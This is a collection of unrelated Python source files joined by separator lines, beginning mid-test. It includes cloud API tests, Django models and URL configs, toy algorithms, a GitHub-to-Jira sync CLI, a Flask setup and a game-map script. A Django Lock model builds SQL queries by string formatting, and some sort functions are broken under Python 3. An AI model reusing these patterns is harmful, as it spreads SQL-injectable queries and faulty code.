self.assertIn(self.third_server, filtered_servers)
@tags(type='positive', net='no')
def test_list_servers_detailed_filter_by_server_name(self):
"""
Filter the list of servers with detail by name.
This will call the list_servers_with_details with the server name that
was created at startup. Then it will get the details of the first
server created during test set up and use that information to validate
that a detailed list of servers respects the server name filter.
The following assertions occur:
- 200 status code from the http call.
- Server 1 is in the list.
- Server 2 and 3 are not in the list.
"""
params = self.server.name
list_response = self.servers_client.list_servers_with_detail(
name=params)
filtered_servers = list_response.entity
self.assertEqual(200, list_response.status_code)
server_under_test = self.servers_client.get_server(
self.server.id).entity
self.assertIn(server_under_test, filtered_servers)
self.assertNotIn(self.second_server, filtered_servers)
self.assertNotIn(self.third_server, filtered_servers)
@tags(type='positive', net='no')
def test_list_servers_detailed_filter_by_server_status(self):
"""
Filter the list of servers with details by server status of active.
This will call the list_servers_with_detail with the status of active
expecting all servers to be returned.
The following assertions occur:
- 200 status code from the http call.
- Server 1, 2 and 3 are in the list.
"""
params = 'active'
list_response = self.servers_client.list_servers_with_detail(
status=params)
filtered_servers = list_response.entity
self.assertEqual(200, list_response.status_code)
servers_list = []
for i in filtered_servers:
servers_list.append(i.id)
self.assertIn(self.server.id, servers_list)
self.assertIn(self.second_server.id, servers_list)
self.assertIn(self.third_server.id, servers_list)
@tags(type='positive', net='no')
def test_list_servers_detailed_filter_by_changes_since(self):
"""
Filter the list of servers with details by changes-since.
This will call the list_servers_with_detail with the expectation of
all servers being returned in the list. The list will be of all
servers but will go through the entries and pull the id into a list
to compare against.
The following assertions occur:
- 200 status code from the http call.
- Server 1, 2 and 3's ids are in the generated list.
"""
params = self.server.created
# Filter the detailed list of servers by changes-since
list_response = self.servers_client.list_servers_with_detail(
changes_since=params)
filtered_servers = list_response.entity
self.assertEqual(200, list_response.status_code)
servers_list = []
for i in filtered_servers:
servers_list.append(i.id)
self.assertIn(self.server.id, servers_list)
self.assertIn(self.second_server.id, servers_list)
self.assertIn(self.third_server.id, servers_list)
|
# -*- coding: utf-8 -*-
from django.core.urlresolvers import reverse
from django.test import Client
from django.test import TestCase
from ckeditor_link.tests.test_app.models import TestModel, LinkModel
class ckeditor_linkDialogTests(TestCase):
fixtures = ['test_app.json', ]
def setUp(self):
self.test_object = TestModel.objects.get(pk=2)
def tearDown(self):
pass
def test_tag_link_target_class_value(self):
"""
does it transform everything as it should?
"""
client = Client()
url = reverse('testmodel_detail', args=[self.test_object.id])
response = client.get(url)
content = response.content
# check it!
def test_tag_no_destruction_of_existing_links(self):
"""
normal existing <a href="xx" should not be tinkered with
"""
pass
def test_tag_robustness(self):
"""
can it handle LinkModel with for example no get_css_class method?
"""
client = Client()
url = reverse('testmodel_detail', args=[self.test_object.id])
response = client.get(url)
content = response.content
# check it!
|
from django.db import models
from netutils.modelfields import NetIPAddressField, NetIPNetworkField
class Bras(models.Model):
name = models.CharField(max_length=200, db_index=True, unique=True)
management_ip = NetIPAddressField(blank=True, null=True)
class Meta:
verbose_name_plural = 'bras'
ordering = ['name']
def __str__(self):
return self.name
class Vrf(models.Model):
bras = models.ForeignKey(Bras, db_index=True)
number = models.IntegerField(db_index=True)
name = models.CharField(max_length=200, db_index=True)
class Meta:
verbose_name_plural = 'vrf'
ordering = ['bras__name', 'number', 'name']
unique_together = [
['bras', 'number'],
['bras', 'name'],
]
index_together = [
['bras', 'number', 'name'],
['bras', 'name'],
]
def __str__(self):
return '%d %s (%s)' % (self.number, self.name, self.bras)
class Loopback(models.Model):
bras = models.ForeignKey(Bras, db_index=True)
number = models.IntegerField()
ip = NetIPAddressField()
vrf = models.ForeignKey(Vrf, blank=True, null=True)
class Meta:
ordering = ['bras__name', 'number']
unique_together = [
['bras', 'number'],
]
index_together = [
['bras', 'number'],
]
def __str__(self):
return 'Loopback%d' % self.number
class Section(models.Model):
bras = models.ForeignKey(Bras, db_index=True)
ipnetwork = NetIPNetworkField(db_index=True)
description = models.CharField(max_length=200, blank=True)
vrf = models.ForeignKey(Vrf, blank=True, null=True)
class Meta:
ordering = ['bras__name', 'ipnetwork']
unique_together = [
['bras', 'ipnetwork'],
]
index_together = [
['bras', 'ipnetwork'],
]
def __str__(self):
return str(self.ipnetwork)
|
# Créé par Nicolas, le 07/12/2015 en Python 3.2
#Le chiffrement atbash consite à inverser l'alphabet; a devient ainsi z, b devient y et ainsi de suite.
def atbash(lettre):
if lettre == "a" or lettre == "à":
return "z"
if lettre == "b":
return "y"
if lettre == "c" or lettre == "ç":
return "x"
if lettre == "d":
return "w"
if lettre == "e" or lettre == "é" or lettre == "è" or lettre == "ê":
return "v"
if lettre == "f":
return "u"
if lettre == "g":
return "t"
if lettre == "h":
return "s"
if lettre == "i":
return "r"
if lettre == "j":
return "q"
if lettre == "k":
return "p"
if lettre == "l":
return "o"
if lettre == "m":
return "n"
if lettre == "n":
return "m"
if lettre == "o":
return "l"
if lettre == "p":
return "k"
if lettre == "q":
return "j"
if lettre == "r":
return "i"
if lettre == "s":
return "h"
if lettre == "t":
return "g"
if lettre == "u" or lettre == "ù":
return "f"
if lettre == "v":
return"e"
if lettre == "w":
return "d"
if lettre == "x":
return "c"
if lettre == "y":
return "b"
if lettre == "z":
return "a"
def miroir(messageClair):
message =""
i = 0
for i in range(0, len(messageClair)):
if messageClair[i].isalpha() == False: #si caractère != lettre, le caractère est ajouté à la chaîne message
message += str(messageClair[i])
else:
message+=str(atbash(messageClair[i]))
return(message)
|
def max_subarray(array):
n = len(array)
low = 0
high = 0
max_sum = array[0]
for i in range(n):
curr_sum = array[i]
if curr_sum >= max_sum:
max_sum = curr_sum
low = i
high = i
for j in range(i + 1, n):
curr_sum += array[j]
if curr_sum > max_sum or (
curr_sum == max_sum and j - i < high - low
):
low = i
high = j
max_sum = curr_sum
return low, high, max_sum
def max_crossing_subarray(array, low, high, mid):
left_sum = float("-Inf")
max_left = low
curr_sum = 0
for i in range(mid, low - 1, -1):
curr_sum += array[i]
if curr_sum > left_sum:
max_left = i
left_sum = curr_sum
right_sum = float("-Inf")
max_right = high
curr_sum = 0
for i in range(mid + 1, high + 1):
curr_sum += array[i]
if curr_sum > right_sum:
max_right = i
right_sum = curr_sum
return max_left, max_right, left_sum + right_sum
def max_subarray_recursive(array, low, high):
if low == high:
return low, high, array[low]
mid = (low + high) // 2
left_low, left_high, left_sum = max_subarray_recursive(array, low, mid)
right_low, right_high, right_sum = max_subarray_recursive(
array, mid + 1, high
)
cross_low, cross_high, cross_sum = max_crossing_subarray(
array, low, high, mid
)
if left_sum >= right_sum and left_sum >= cross_sum:
return left_low, left_high, left_sum
if right_sum >= left_sum and right_sum >= cross_sum:
return right_low, right_high, right_sum
return cross_low, cross_high, cross_sum
def max_subarray_divide_and_conquer(array):
return max_subarray_recursive(array, 0, len(array) - 1)
def max_subarray_linear(numbers):
"""Find a contiguous subarray with the largest sum."""
best_sum = float("-inf")
best_start = best_end = 0 # or: None
current_sum = 0
for current_end, x in enumerate(numbers):
if current_sum <= 0:
# Start a new sequence at the current element
current_start = current_end
current_sum = x
else:
# Extend the existing sequence with the current element
current_sum = max(current_sum + x, x)
if current_sum > best_sum:
best_sum = current_sum
best_start = current_start
best_end = current_end
return best_start, best_end, best_sum
# a = [1, -4, 5, 1, -3]
a = [13, -3, -25, 20, -3, -16, -23, 18, 20, -7, 12, -5, -22, 15, -4, 7]
a = [-4, -5, -4, 2, -7]
print(max_subarray(a))
print(max_subarray_divide_and_conquer(a))
print(max_subarray_linear(a))
|
import click
import os
from passlib.context import CryptContext
from wrappers.jirawrapper import MyJiraWrapper
from plugins.jira_workflow import (
start_issue_workflow,
start_create_pull_requests_workflow,
start_review_pull_requests_workflow
)
from utils.utils import (
echo_success,
echo_error,
update_yaml,
configure_interval,
get_yaml_data
)
from plugins.github import (
GitHubPlugin,
)
class Config(object):
def __init__(self):
self.config_file = "config.yaml"
self.pwd_context = CryptContext(
schemes=["pbkdf2_sha256"],
default="pbkdf2_sha256",
pbkdf2_sha256__default_rounds=30000
)
pass_config = click.make_pass_decorator(Config, ensure=True)
def encrypt_password(pwd_context, password):
return pwd_context.encrypt(password)
def check_encrypted_password(pwd_context, password, hashed):
return pwd_context.verify(password, hashed)
def set_config_properties(git_urls, config_dict):
content = {}
git_urls = {'git_urls': str(git_urls).encode().split(',')}
content.update(git_urls)
if config_dict is None:
config_dict = dict()
for key, value in config_dict.items():
content.update({key: value})
return content
def formatting(header, github_list):
echo_error("=================================")
echo_error(header)
echo_error("=================================")
if len(github_list) == 0:
echo_error("No new item found !")
else:
for item in github_list:
echo_error(item.data['url'])
print("\n")
@click.group()
@click.option('--debug/--no-debug', default=False)
def cli(debug):
"""This CLI tool to sync and track GitHub issues, pr's, pr_reviews
with Jira. Currently supported to only for create, update and
close status.
"""
pass
@cli.command()
@click.option('--git-urls', default=None, prompt=True,
help="Pass the git project names for Jira sync e.g. airgun, robottelo")
@click.option('--jira-url', prompt=True, confirmation_prompt=False,
help="Pass the Jira url")
@click.option('--github-username', default=None, prompt=True,
help="Pass GitHub username")
@click.option('--jira-username', default=None, prompt=True,
help="Pass Jira username")
@click.option('--jira-email-id', default=None, prompt=True,
help="Pass Jira Email Id")
@click.option('--jira-board', prompt=True, confirmation_prompt=False,
help='Pass the Jira board name')
@click.option('--jira-project', prompt=True, confirmation_prompt=False,
help='Pass the Jira project name')
@pass_config
def set_config(config, git_urls, jira_url, github_username, jira_username,
jira_email_id, jira_board, jira_project):
"""Set git_urls and github username"""
if os.path.exists(config.config_file):
os.unlink(config.config_file)
try:
if None not in (git_urls, github_username, jira_username, jira_email_id,
jira_board, jira_project, jira_url):
auth_dict = {
'kerberos': True,
'basic_auth': False,
'username': str(jira_username).encode()
}
content_dict = {
'url': str(jira_url).encode(),
'github_username': str(github_username).encode(),
'board': str(jira_board).encode(),
'project': str(jira_project).encode(),
'email_id': str(jira_email_id).encode(),
'auth': auth_dict,
'ca_cert_path': "/etc/ssl/certs/ca-bundle.crt",
'verify_ssl': True,
'label_check': False,
'check_for_updates': 'false'
}
content = set_config_properties(git_urls,
content_dict)
update_yaml(config.config_file, content)
echo_success("Configs are set !")
jira = MyJiraWrapper('config.yaml', 'labels.yaml')
else:
echo_error("Please Pass missing options!")
except Exception as err:
click.echo(err)
@cli.command()
@click.option('--interval', default='week',
help="please pass interval e.g. week, day")
@pass_config
def check_github_history(config, interval):
"""See GitHub History result based on intervals
e.g. jirasync check-github-history --interval week """
if interval not in ['week', 'day']:
echo_error("Please pass correct interval. e.g. 'week', 'day'")
exit(1)
else:
interval = configure_interval(interval)
yaml_data = get_yaml_data(config.config_file)
git_hub_plugin = GitHubPlugin(yaml_data['github_username'],
yaml_data['email_id'],
interval,
yaml_data['git_urls']
)
issue_list = git_hub_plugin.get_github_issues_created_list()
assigned_issue_list = git_hub_plugin.get_github_issues_assigned_list()
pr_list = git_hub_plugin.get_opened_pull_requests()
pr_closed_list = git_hub_plugin.get_pull_requests_merged_closed()
pr_review_list_closed = git_hub_plugin.get_pull_requests_reviewed()
pr_review_list_open = git_hub_plugin.get_pull_requests_review_in_progress()
formatting('Issues Created', issue_list)
formatting('Issues Assigned', assigned_issue_list)
formatting('PR Raised', pr_list)
formatting('PR Merged', pr_closed_list)
formatting('PR Reviewed Closed Status', pr_review_list_closed)
formatting('PR Reviewed Open Status', pr_review_list_open)
@cli.command()
@click.option('--interval', default='week',
help="please pass interval e.g. week, day")
@pass_config
def start_syncing(config, interval):
"""Sync github issues, pr, pr_reviews as Jira tasks.
Currently supported day and week interval
e.g. jirasync start-syncing --interval week
"""
if interval not in ['week', 'day']:
echo_error("Please pass correct interval. e.g. 'week', 'day'")
exit(1)
else:
interval = configure_interval(interval)
yaml_data = get_yaml_data(config.config_file)
git_hub_plugin = GitHubPlugin(yaml_data['github_username'],
yaml_data['email_id'],
interval, yaml_data['git_urls']
)
created_issue_list = git_hub_plugin.get_github_issues_created_list()
assigned_issue_list = git_hub_plugin.get_github_issues_assigned_list()
pr_list = git_hub_plugin.get_opened_pull_requests()
pr_closed_list = git_hub_plugin.get_pull_requests_merged_closed()
pr_review_list_closed = git_hub_plugin.get_pull_requests_reviewed()
pr_review_list_open = git_hub_plugin.get_pull_requests_review_in_progress()
jira = MyJiraWrapper('config.yaml', 'labels.yaml')
# formatting('Issues Created', created_issue_list)
# formatting('Issues Assigned', assigned_issue_list)
# formatting('PR Raised', pr_list)
# formatting('PR Merged', pr_closed_list)
# formatting('PR Reviewed Closed Status', pr_review_list_closed)
# formatting('PR Reviewed Open Status', pr_review_list_open)
start_issue_workflow(github_issues=created_issue_list, jira=jira)
start_issue_workflow(github_issues=assigned_issue_list, jira=jira)
start_create_pull_requests_workflow(github_issues=pr_list, jira=jira)
start_create_pull_requests_workflow(github_issues=pr_closed_list, jira=jira)
start_review_pull_requests_workflow(github_issues=pr_review_list_closed, jira=jira)
start_review_pull_requests_workflow(github_issues=pr_review_list_open, jira=jira)
|
# Generated by Django 3.0 on 2019-12-11 23:14
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('landing', '0002_aluno_usuario'),
]
operations = [
migrations.RenameField(
model_name='aluno',
old_name='usuario',
new_name='Usuario',
),
]
|
#Кругляши
num = input()
arr = []
count=0
for i in num:
a = int(i)
if a == 0 or a == 6 or a == 9:
count+=1
elif a == 8:
count+=2
print(count) |
#from django.urls import path, re_path
from django.conf.urls import url
from django.urls import path
from . import views
app_name = 'cal'
urlpatterns = [
url(r'^index/$', views.index, name='index'),
url(r'^calendar/$', views.CalendarView.as_view(), name='calendar'),
url(r'^event/new/$', views.event, name='event_new'),
url(r'^event/(?P<event_id>\d+)/$', views.event, name='event'),
url('ical/', views.ical, name='ical'),
path('manage_events', views.manage_events, name="manage_events"),
path('add_event', views.add_event, name="add_event"),
path('edit_event/<str:event_id>', views.edit_event, name="edit_event"),
path('delete_event/<str:event_id>', views.delete_event, name="delete_event"),
] |
from flask import Flask, request
from flask_restful import Resource, Api, reqparse
from flask_sqlalchemy import SQLAlchemy
from flask_migrate import Migrate, MigrateCommand
from flask_script import Manager
from flask_jwt_extended import JWTManager, verify_jwt_in_request, get_jwt_claims
from datetime import timedelta
from functools import wraps
from flask_cors import CORS
import json, random, string, os
app = Flask(__name__) # membuat semua blueprint
app.config["APP_DEBUG"] = True
CORS(app)
# JWT Config
app.config["JWT_SECRET_KEY"] = "".join(random.choice(string.ascii_letters) for i in range(32))
app.config["JWT_ACCESS_TOKEN_EXPIRES"] = timedelta(days=1)
jwt = JWTManager(app)
# SQLAlchemy Config
try:
env = os.environ.get('FLASK_ENV', 'development')
if env == 'testing':
app.config['SQLALCHEMY_DATABASE_URI'] = 'mysql+pymysql://root:@127.0.0.1:3306/rest_portofolio_test'
else:
app.config['SQLALCHEMY_DATABASE_URI'] = 'mysql+pymysql://root:@127.0.0.1:3306/rest_portofolio_test'
except Exception as e:
raise e
app.config["SQLALCHEMY_TRACK_MODIFICATIONS"] = False
db = SQLAlchemy(app)
migrate = Migrate(app, db)
manager = Manager(app)
manager.add_command('db', MigrateCommand)
#admin & non-admin authorization
def admin_required(fn):
@wraps(fn)
def wrapper(*args, **kwargs):
verify_jwt_in_request()
claims = get_jwt_claims()
if not claims["is_admin"]:
return {"status": "FORBIDDEN", "message": "You should be an admin to access this point"}, 403
return fn(*args, **kwargs)
return wrapper
def user_required(fn):
@wraps(fn)
def wrapper(*args, **kwargs):
verify_jwt_in_request()
claims = get_jwt_claims()
if claims["is_admin"]:
return {"status": "FORBIDDEN", "message": "You should be a user to access this point"}, 403
return fn(*args, **kwargs)
return wrapper
@app.after_request
def after_request(response):
try:
request_data = request.get_json()
except:
request_data = request.args.to_dict()
if response.status_code == 200:
app.logger.info("REQUEST_LOG\t%s", json.dumps({
"method": request.method,
"code": response.status,
"request": request_data,
"response": json.loads(response.data.decode("utf-8"))
}))
else:
app.logger.error("REQUEST_LOG\t%s", json.dumps({
"method": request.method,
"code": response.status,
"request": request_data,
"response": json.loads(response.data.decode("utf-8"))
}))
return response
from blueprints.login import blueprint_login
from blueprints.users.resources import blueprint_user
from blueprints.shops.resources import blueprint_shop, blueprint_public_shop
from blueprints.products.resources import blueprint_product
from blueprints.blogs.resources import blueprint_blogs
from blueprints.carts.resources import blueprint_cart
from blueprints.checkout import blueprint_checkout
from blueprints.history import blueprint_history
from blueprints.admin import blueprint_admin
app.register_blueprint(blueprint_login, url_prefix="/users/login")
app.register_blueprint(blueprint_user, url_prefix="/users")
app.register_blueprint(blueprint_shop, url_prefix="/users/shops")
app.register_blueprint(blueprint_public_shop, url_prefix="/public/shops")
app.register_blueprint(blueprint_product, url_prefix="/public/products")
app.register_blueprint(blueprint_blogs, url_prefix="/public/blogs")
app.register_blueprint(blueprint_cart, url_prefix="/users/carts")
app.register_blueprint(blueprint_checkout, url_prefix="/users/checkout")
app.register_blueprint(blueprint_history, url_prefix="/users/history")
app.register_blueprint(blueprint_admin, url_prefix="/admin")
db.create_all()
|
import logging
import warnings
warnings.filterwarnings("ignore")
logger = logging.getLogger(__name__)
supported_trials = [
"categorical",
"discrete_uniform",
"float",
"int",
"loguniform",
"uniform",
]
def trial_suggest_loader(trial, config):
_type = config["type"]
assert (
_type in supported_trials
), f"Type {_type} is not valid. Select from {supported_trials}"
if _type == "categorical":
return trial.suggest_categorical(**config["settings"])
if _type == "discrete_uniform":
return int(trial.suggest_discrete_uniform(**config["settings"]))
if _type == "float":
return float(trial.suggest_float(**config["settings"]))
if _type == "int":
return int(trial.suggest_int(**config["settings"]))
if _type == "loguniform":
return float(trial.suggest_loguniform(**config["settings"]))
if _type == "uniform":
return float(trial.suggest_uniform(**config["settings"]))
|
# -*- coding: utf-8 -*-
# 是/否
import json
from django.http import HttpResponse
TRUE = '1'
FALSE = '0'
TRUE_INT = 1
FALSE_INT = 0
CHANNEL_SORT_DEFAULT = '100'
# 图片/文件/附件 存储位置
PROPAGANDA_PIC = 'propaganda/' # 轮播宣传图
CATELORY_TITLE_PIC = 'catelory/title' # 栏目的题图图片存放位置
CATELORY_TYPE_INTRO_PIC = 'catelory/type_intro' # 栏目的类型介绍图片存放位置
COMPONENT_PIC = 'component/pic' # 基本组件配图存放位置
QUICKFUNC_PIC = 'quickfunc' # 快速功能配图存放位置
ARTICLE_COVER = 'article/%s/cover/%s' # 文章封面 (article/年份月份/cover/文件名)
ARTICLE_IMAGE = 'article/%s/image/' # 文章图片 (article/年份月份/image/)
ARTICLE_FILE = 'article/%s/file/' # 文章附件 (article/年份月份/file/)
ARTICLE_VIDEO = 'article/%s/video/' # 文章视频 (article/年份月份/video/)
ARTICLE_IMAGE_TEMP = 'temp/%s/image/' # 文章图片暂存
ARTICLE_IMAGE_FILE = 'temp/%s/file/' # 文章附件暂存
ARTICLE_VIDEO_TEMP = 'temp/%s/video/' # 视频附件暂存
EXPERT_IMAGE = 'expert/image/%s' # 专家头像
TEMP_IMAGE = 'temp/images/' # 临时图片存放地址
# 不同级别栏目静态定义常量
# IS_A_CHANNEL = '0'
# IS_A_CATEGORY = '1'
# IS_A_PUSH_CHANNEL = '9'
# 系统参数常量表
NEW_PUBLISH_TIME = 'new_publish_time'
DEFAULT_ARTICLE_PIC = 'default_article_pic'
HOMEPAGE_REF_CPNT_KEYS = 'homepage_ref_cpnt_keys'
HOMEPAGE_REF_COL_KEYS = 'homepage_ref_col_keys'
CODE_CHANNEL = '1'
CODE_CATEGORY = '2'
CODE_PUSH_CHANNEL = '9'
# --------------------- 数据库相关字段的静态值定义 ---------------------
DB_ARTICLE_ADMIT_STATE_PEND = 0
DB_ARTICLE_ADMIT_STATE_PASS = 1
DB_ARTICLE_ADMIT_STATE_FAIL = 2
DB_USER_ROLE_ADMIN = 0
DB_USER_ROLE_TEACHER = 1
DB_USER_ROLE_STUDENT = 2
DB_USER_ROLE_OTHER = 3
MANAGE_DRAFT_COMMON = 1
MANAGE_DRAFT_PROFILE = 2
MANAGE_DRAFT_PHOTO = 3
MANAGE_DRAFT_JOURNAL = 4
JOB_STATE_PEND = 0 # 待处理
JOB_STATE_OK = 1 # 处理成功
JOB_STATE_DEAL = 2 # 处理中
JOB_STATE_FAIL = 3 # 处理失败
def helper_const_list(request):
data = [
{'code': 'FALSE', 'value': '0', 'intro': u'否(用于is_xxx字段)'},
{'code': 'TRUE', 'value': '1', 'intro': u'是(用于is_xxx字段)'},
{'code': 'DB_ARTICLE_ADMIT_STATE_PEND', 'value':'0', 'intro': u'文章审核状态:待审核'},
{'code': 'DB_ARTICLE_ADMIT_STATE_PASS', 'value': '1', 'intro': u'文章审核状态:已通过审核'},
{'code': 'DB_ARTICLE_ADMIT_STATE_FAIL', 'value': '2', 'intro': u'文章审核状态:未通过审核'},
{'code': 'DB_USER_ROLE_ADMIN', 'value': '0', 'intro': u'角色:管理员'},
{'code': 'DB_USER_ROLE_TEACHER', 'value': '1', 'intro': u'角色:普通教师'},
{'code': 'DB_USER_ROLE_STUDENT', 'value': '2', 'intro': u'角色:学生'},
{'code': 'DB_USER_ROLE_OTHER', 'value': '3', 'intro': u'角色:其它'},
{'code': 'CODE_CHANNEL', 'value': '1', 'intro': u'标识:频道(一级栏目)'},
{'code': 'CODE_CATEGORY', 'value': '2', 'intro': u'标识:栏目(二级栏目)'},
{'code': 'CODE_PUSH_CHANNEL', 'value': '9', 'intro': u'标识:推送频道'},
{'code': 'MANAGE_DRAFT_COMMON', 'value': '1', 'intro': u'一般文章展示型'},
{'code': 'MANAGE_DRAFT_PROFILE', 'value': '2', 'intro': u'人物肖像展示型'},
{'code': 'MANAGE_DRAFT_PHOTO', 'value': '3', 'intro': u'照片墙展示型'},
{'code': 'MANAGE_DRAFT_JOURNAL', 'value': '4', 'intro': u'刊物展示型'},
{'code': 'JOB_STATE_PEND', 'value': '0', 'intro': u'待处理'},
{'code': 'JOB_STATE_OK', 'value': '1', 'intro': u'处理成功'},
{'code': 'JOB_STATE_DEAL', 'value': '2', 'intro': u'处理中'},
{'code': 'JOB_STATE_FAIL', 'value': '3', 'intro': u'处理失败'},
]
dict_resp = {"c": 0, "m": u'请求完成', "d": data}
return HttpResponse(json.dumps(dict_resp, ensure_ascii=False), content_type="application/json") |
from django.urls import path, include
from django.contrib.auth import views as auth_views
from .views import SignUpView
urlpatterns = [
path('signup/', SignUpView.as_view(), name='signup'),
path('password_reset/', auth_views.PasswordResetView.as_view(), name ='password_reset'),
]
# pathpatterns = [
# # path(r'^$', HomeView.as_view(), name='home'),
# re_path(r'^register/$', register_view, name='signup'),
# re_path(r'^activate/(?P<uidb64>[0-9A-Za-z_\-]+)/(?P<token>[0-9A-Za-z]{1,13}-[0-9A-Za-z]{1,20})/$',
# activate, name='users_activate'),
# re_path('login/', auth_views.LoginView, {
# 'template_name': "users/registration/login.html"},
# name='login'),
# re_path('logout/', auth_views.LogoutView,
# {'next_page': settings.LOGIN_REDIRECT_path}, name='logout'),
# re_path(r'^password_reset/$', auth_views.PasswordResetView,
# {'template_name': "users/registration/password_reset_form.html"},
# name='password_reset'),
# re_path(r'^password_reset/done/$', auth_views.PasswordResetDoneView,
# {'template_name': "users/registration/password_reset_done.html"},
# name='password_reset_done'),
# re_path(r'^reset/(?P<uidb64>[0-9A-Za-z_\-]+)/(?P<token>[0-9A-Za-z]{1,13}-[0-9A-Za-z]{1,20})/$',
# auth_views.PasswordResetConfirmView,
# {'template_name': "users/registration/password_reset_confirm.html"},
# name='password_reset_confirm'),
# re_path(r'^reset/done/$', auth_views.PasswordResetCompleteView,
# {'template_name': "users/registration/password_reset_complete.html"},
# name='password_reset_complete'),
# ] |
from decimal import Decimal
from pydantic import PositiveInt
class Mutation(str):
"""
Validate a mutation field.
A mutation field starts with + or - and is followed by a decimal
"""
def _get_sign(self):
"""
Parses the first character into an allowed sign
"""
if str(self)[0] == "-":
return Decimal(-1)
elif str(self)[0] == "+":
return Decimal(1)
raise ValueError("Unknown sign in mutation")
def _get_number(self):
"""
Parses the rest of the mutation into a Decimal
"""
return Decimal(str(self)[1:])
def _get_mutation_amount(self):
"""
Combine the sign with the number to get if this returns a positive or negative mutation
"""
return self._get_sign() * self._get_number()
def validate_transaction(self, start_balance: Decimal, end_balance: Decimal, reference: PositiveInt):
if start_balance + self._get_mutation_amount() != end_balance:
raise ValueError(f"Transaction {reference} does not add up")
@classmethod
def __get_validators__(cls):
yield cls.validate
@classmethod
def __modify_schema__(cls, field_schema):
field_schema.update(
examples=['-1.0', '+1.0', '-1.20'],
)
@classmethod
def validate(cls, v):
if v[0] not in ["+", "-"]:
raise TypeError("First character of a mutation must be + or -")
try:
Decimal(v[1:])
except:
raise TypeError("All other characters must be parsable to a decimal")
return v
class Config:
allow_population_by_field_name = True
|
def bubble_sort(nums):
"""
Sorts a list of integers using bubble sort algorithm
:param nums:
:return: list
"""
n = len(nums)
if not nums:
return []
for i in range(n):
for j in range(i, n):
if nums[i] > nums[j]:
nums[i] = nums[i] + nums[j]
nums[j] = nums[i] - nums[j]
nums[i] = nums[i] - nums[j]
return nums
def merge_sort(nums):
"""
Sorts a list of numbers using merge sort algorithm
:param nums:
:return: list
"""
if not nums:
return []
if len(nums) == 1:
return nums
mid = len(nums) / 2
left = merge_sort(nums[:mid])
right = merge_sort(nums[mid:])
return merge(left, right)
def merge(left, right):
"""
Helper function for merge sort; Merges two sorted lists in order
:param left:
:param right:
:return: list
"""
res = []
while left and right:
if left[0] <= right[0]:
res.append(left.pop(0))
else:
res.append(right.pop(0))
return res + left + right
def quick_sort(nums, left=None, right=None):
"""
Sorts a list on numbers using quick sort
:param nums:
:param left:
:param right:
:return: list
"""
left = 0 if left is None else left
right = len(nums) - 1 if right is None else right
if left >= right:
return nums
pivot = nums[left + (right-left)/2]
idx = partition(nums, left, right, pivot)
quick_sort(nums, left, idx - 1)
quick_sort(nums, idx, right)
return nums
def partition(nums, left, right, pivot):
"""
Helper function for quick sort; Partitions the numbers so that all numbers
smaller than partition are on the left and greater on the right
:param nums:
:param left:
:param right:
:param pivot:
:return: int index
"""
while left <= right:
while nums[left] < pivot:
left += 1
while nums[right] > pivot:
right -= 1
if left <= right:
tmp = nums[left]
nums[left] = nums[right]
nums[right] = tmp
left += 1
right -= 1
return left
|
#!/usr/bin/python3 -d
"""
This file is part of Linspector (https://linspector.org/)
Copyright (c) 2013-2023 Johannes Findeisen <you@hanez.org>. All Rights Reserved.
See LICENSE.
"""
# TODO: Make this a curses style TUI interface for Linspector using urwid or maybe some more modern
# framework like textual. Look at the Lish code for more details about backend implementation and
# the general idea for implementing Linspector clients.
|
import hoi4
import os
import re
import collections
import pyradox
from PIL import Image
def compute_country_tag(filename):
m = re.match('.*([A-Z]{3})\s*-.*\.txt$', filename)
return m.group(1)
def compute_color(values):
if isinstance(values[0], int):
# rgb
r = values[0]
g = values[1]
b = values[2]
return (r, g, b)
else:
# hsv
return pyradox.image.HSVtoRGB(values)
date = pyradox.Date('1936.1.1')
scale = 2.0
# state_id -> [tag]
capital_states = {}
country_colors = {}
country_color_file = pyradox.txt.parse_file(os.path.join(pyradox.get_game_directory('HoI4'), 'common', 'countries', 'colors.txt'))
for filename, country in pyradox.txt.parse_dir(os.path.join(pyradox.get_game_directory('HoI4'), 'history', 'countries')):
tag = compute_country_tag(filename)
if tag in country_color_file:
country_colors[tag] = compute_color(tuple(country_color_file[tag].find_all('color')))
else:
print('HACK FOR %s' % tag)
country_colors[tag] = (165, 102, 152)
print(tag, country_colors[tag])
if country['capital'] not in capital_states: capital_states[country['capital']] = []
capital_states[country['capital']].append(tag)
# Load states.
states = pyradox.txt.parse_merge(os.path.join(pyradox.get_game_directory('HoI4'), 'history', 'states'))
province_map = pyradox.worldmap.ProvinceMap(game = 'HoI4')
# provinces -> state id
colormap = {}
textcolormap = {}
groups = {}
for state in states.values():
k = tuple(province_id for province_id in state.find_all('provinces') if not province_map.is_water_province(province_id))
groups[k] = str(state['id'])
history = state['history'].at_time(date)
controller = history['controller'] or history['owner']
controller_color = country_colors[controller]
if controller in history.find_all('add_core_of'):
color = tuple(x // 4 + 191 for x in controller_color)
textcolormap[k] = (0, 0, 0)
else:
color = tuple(x // 4 for x in controller_color)
textcolormap[k] = (255, 255, 255)
# color the province
for province_id in state.find_all('provinces'):
if not province_map.is_water_province(province_id):
colormap[province_id] = color
out = province_map.generate_image(colormap, default_land_color=(255, 255, 255), edge_color=(127, 127, 127), edge_groups = groups.keys())
# out = out.resize((out.size[0] * scale, out.size[1] * scale), Image.NEAREST)
# unfortunately lakes don't have unitstacks.txt
province_map.overlay_text(out, groups, colormap = textcolormap, fontfile = "tahoma.ttf", fontsize = 9, antialias = False)
out.save('out/add_core_of_map.png')
#pyradox.image.save_using_palette(out, 'out/province__id_map.png')
|
from django.db import connection
from django.db import models
class Lock(models.Model):
key = models.CharField(primary_key=True, max_length=25, unique=True)
def __enter__(self):
self.cursor = connection.cursor()
self.cursor.execute("SELECT count(*) FROM {} where `key`='{}'".format(self._meta.db_table, self.key))
if not self.cursor.fetchone()[0]:
self.cursor.execute("REPLACE INTO {} (`key`) values('{}')".format(self._meta.db_table, self.key))
self.cursor.execute("COMMIT")
self.cursor.execute("BEGIN")
self.cursor.execute("SELECT * FROM {} WHERE `key`='{}' FOR UPDATE".format(self._meta.db_table, self.key))
def __exit__(self, type, value, traceback):
self.cursor.execute("COMMIT")
"""
Usage:
with Lock(key=key):
# do stuff
"""
|
from google.appengine.ext import db
class FlashImage(db.Model):
url = '/fupload/'
uploaded_data = db.BlobProperty()
date = db.DateTimeProperty(auto_now_add=True)
comment = db.TextProperty()
title = db.StringProperty()
filename = db.StringProperty(default = "uploaded_image.png")
def __unicode__(self): return str(self.filename)
def get_embed(self): return u"<img src='/fupload/%s' />" % (self.key())
def get_link(self): return u"<a href='/fupload/%s'>%s</a>" % (self.key(),self.filename)
